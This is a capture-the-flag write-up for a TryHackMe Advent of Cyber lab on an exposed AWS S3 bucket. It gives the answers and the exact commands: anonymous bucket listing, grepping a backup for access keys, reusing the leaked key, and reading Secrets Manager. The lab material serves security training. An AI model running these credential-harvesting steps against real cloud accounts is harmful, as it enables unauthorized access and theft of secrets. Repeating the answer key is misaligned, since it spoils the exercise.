Writeup: Advent of Cyber 3 Day 17 - AtomicMaya/knowledge-base GitHub Wiki

Advent of Cyber - Day 17

Link: Advent Of Cyber 3 on TryHackMe

Question 1

What is the name of the S3 Bucket used to host the HR Website announcement?

Copy the image address: https://s3.amazonaws.com/images.bestfestivalcompany.com/flyer.png, it is contained within.

Answer: images.bestfestivalcompany.com

Question 2

What is the message left in the flag.txt object from that bucket?

Command: curl https://s3.amazonaws.com/images.bestfestivalcompany.com/flag.txt

Answer: It's easy to get your elves data when you leave it so easy to find!

Question 3

What other file in that bucket looks interesting to you?

Command: aws s3 ls s3://images.bestfestivalcompany.com/ --no-sign-request

Answer: wp-backup.zip

Question 4

What is the AWS Access Key ID in that file?


curl https://s3.amazonaws.com/images.bestfestivalcompany.com/wp-backup.zip > wp-backup.zip
unzip -qq wp-backup.zip
cd wp_backup
grep -Rn "AKIA" ./

For the secret key: grep -Rn "S3_" ./


Question 5

What is the AWS Account ID that access-key works for?


aws configure --profile temp

# Fill in AWS Secret Access Key: Y+2fQBoJ+X9N0GzT4dF5kWE0ZX03n/KcYxkS1Qmc
# Fill in Default region name: us-east-1
# Fill in Default output format: json

aws sts get-caller-identity --profile temp

Answer: 019181489476

Question 6

What is the Username for that access-key?

See the previous question.

Answer: [email protected]

Question 7

There is an EC2 Instance in this account. Under the TAGs, what is the Name of the instance?

Command: aws ec2 describe-instances --output text --region us-east-1 --profile me

Answer: HR-Portal

Question 8

What is the database password stored in Secrets Manager?

We first want to get the list of secrets: aws secretsmanager list-secrets --profile me

We then want to get the secret named HR-Password: aws secretsmanager get-secret-value --secret-id HR-Password --version-stage AWSPREVIOUS --profile me. This gives us a string that tells us the secret is in another region. (Big "Your princess is in another castle vibes)

Santa lives in the north pole, so let us try with eu-north-1: aws secretsmanager get-secret-value --secret-id HR-Password --version-stage AWSPREVIOUS --profile me --region eu-north-1

Answer: Winter2021!